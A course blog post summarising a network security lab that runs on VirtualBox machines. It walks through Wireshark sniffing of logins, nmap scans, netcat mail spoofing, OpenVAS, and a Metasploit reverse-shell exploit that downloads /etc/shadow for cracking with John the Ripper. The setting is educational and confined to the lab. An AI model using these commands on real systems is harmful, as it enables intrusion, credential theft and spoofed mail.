This post is mainly addressed to students of the Network Security course. However, anyone can read and comment this post, though you should look at the content in a didactic point of view.
Below is the summary of what we saw in class on Tuesday 4th and Thursday 6th December 2012. Please notice that a “copy and paste” behavior is completely wrong; instead try other solutions and study what each command can do. Students must be encouraged to understand before to use a tool.
VIRTUALBOX CONFIGURATION
Alice machine
User: alice
Password: alice
IP: 192.168.1.2
Bob machine
User: bob, root
Password: bob
IP: 192.168.1.1
BackTrack5r3 machine
User: root
Password: toor
IP: no default IP
Start the Desktop Environment
After you have logged on BackTrack, run the following command:
~# startx
Internal Network Configuration
Open terminator and run the following command:
~# ifconfing eth1 192.168.1.4
Switch from Internal Network to NAT or Bridged Adapter
– Right click on the network icon and select Network Adapters
– Change Attached to option from Internal Network to NAT (or Bridged Adapter) and press OK. Be sure that the network interface is the one in use. For instance, if you are connected via WiFi, the interface must be the wireless adapter.
– Open terminator and run the following commands:
~# /etc/init.d/wicd start
# wicd-gtk --no-tray
– Press the Connect button. If it is already connected, first press the Disconnect button.
Switch from NAT or Bridged Adapter to Internal Network
– Right click on the network icon and select Network Adapters
– Change Attached to option from NAT (or Bridged Adapter) to Internal Network and press OK
~# wicd-gtk --no-tray
– Press the Disconnect button.
– Open terminator and run the following commands:
~# /etc/init.d/wicd stop
# ifconfing eth1 192.168.1.4
WIRESHARK AND SNIFFING
Local Sniffing
– Open Wireshark in BackTrack5r3 by running the following command:
~# wireshark
– Open the Interfaces window: CTRL+I
– Select eth1 and click on Start
– Open Firefox and go to: http://192.168.1.2 (the alice’s web server)
– Click on Alice’s Message Board and log in: bob/bob123 or alice/alice123
– Go back to Wireshark, right click on a HTTP or TCP packet and select Follow TCP Stream
– Look at the whole stream and notice data about login!
Remote Sniffing
– Right click on the network icon of BackTrack5r3 and select Network Adapters
– Set the Promiscuous Mode option to Allow VMs and press OK
– Open Wireshark in BackTrack5r3 by running the following command:
~# wireshark
– Open the Interfaces window: CTRL+I
– Select eth1 and click on Start
– Open Firefox in the alice’s machine and go to: http://192.168.1.1 (the bob’s web server)
– Log in to the web site: bob/bob123
– Go back to Wireshark, right click on a HTTP or TCP packet and select Follow TCP Stream
– Look at the whole stream and notice data about login!
NMAP
Host Discovery
~# nmap -sn 192.168.1.0/24
Port scanning
TCP connect scan
~# nmap -sT 192.168.1.2
TCP SYN scan
~# nmap -sS 192.168.1.2
UDP scan
~# nmap -sU -p 21-25 192.168.1.2
Detection of the service version
~# nmap -sV -p 80 192.168.1.2
OS detection
~# nmap -O 192.168.1.2
OS and Version detection, traceroute
~# nmap -A 192.168.1.2
If you want to get more information add the -v option to your commands.
TELNET & NETCAT
– Telnet is used for interactive communication with another host by using the TELNET protocol. You can log in in other systems if you know credentials.
~# telnet 192.168.1.2 23
Login: alice
Password: alice
$ ls
– Netcat is a simple utility which reads and writes data across network connections, using TCP or UDP protocol. For instance, you could send anonymous mails if you can find an SMTP server which permits anonymous connections.
~# nc <SMTP_SERVER_IP> 25
HELO francesco
MAIL FROM: my@mail.com
RCPT TO: other@mail.com
DATA
From: my@mail.com
To: other@mail.com
Subject:<your_subject>
<your body here>
.
QUIT
Or you can get a web page’s source by sending a GET request to a web server:
~# nc 192.168.1.2 80
get
Or, again, you can connect to the echod daemon running on the Bob machine and send some strings:
~# nc 192.168.1.1 12345
hello!
OPENVAS
Run the OpenVAS bash script in BackTrack5r3:
~# cd Desktop
# ./run_openvas.sh
Use Greenbone Security Desktop or open Greenbone Security Assistant in Firefox: http://127.0.0.1:9392
User: openvasadmin
Pass: openvasadmin
Create a new target (192.168.1.1 for Bob or 192.168.1.2 for Alice), then create a new task and start the scanning. When the scanning is over, read the report and consult the vulnerabilities.
METASPLOIT FRAMEWORK
Once you have discovered a vulnerability you can use Metasploit Framework to exploit the bug. Open terminator and run the following commands (please be patient when you run msfconsole, it takes a little to start):
~# msfconsole
msf> help
msf> search port:<port_number> type:exploit <key>
msf> use <path_exploit>
msf> set <exploit_variable> <value>
msf> show payloads
msf> set PAYLOAD <payload_name>
msf> set <payload_variable> <value>
msf> show options
msf> set RHOST <value>
msf> set RPORT <value>
msf> set LHOST <value>
msf> set LPORT <value>
msf> exploit
msf> help
msf> exit (when you finish)
For example, if you want to attack the Bob’s machine, you can exploit the echod service:
~# msfconsole
msf> search type:exploit echo
msf> info exploit/linux/appseclab/echod
msf> use exploit/linux/appseclab/echod
msf> show options
msf> show payloads
msf> set PAYLOAD linux/x86/shell_reverce_tcp
msf> set ENCODER generic/none
msf> set RHOST 192.168.1.1
msf> set RPORT 12345
msf> set LHOST 192.168.1.4
msf> set LPORT 3333
msf> exploit
ls
cd /home/bob
ls
exit
Try the same exploit by using the linux/x86/meterpreter/reverse_tcp payload and steal the system passwords:
~msf> set PAYLOAD linux/x86/meterpreter/reverse_tcp payload
msf> exploit
meterpreter> help
meterpreter> download /etc/shadow ~/Desktop
meterpreter> exit
Decrypt passwords in the shadow file by using John The Ripper.
JOHN THE RIPPER
Open terminator and run the following commands:
~# cd /pentest/passwords/john
# rm john.pot
# ./john ~/Desktop/shadow
VULNERABLE CONFIGURATIONS
Run the following command on the Alice’s machine:
~# xhost +
Now, run the command below on BackTrack5r3:
~# xtv -d 192.168.1.2:0.0
DEMO VIDEOS
For a better quality, please watch the following videos on youtube. Select the HD resolution and maximize to full screen.
Local and Remote Sniffing with Wireshark
An example of attack: nmap and metasploit framework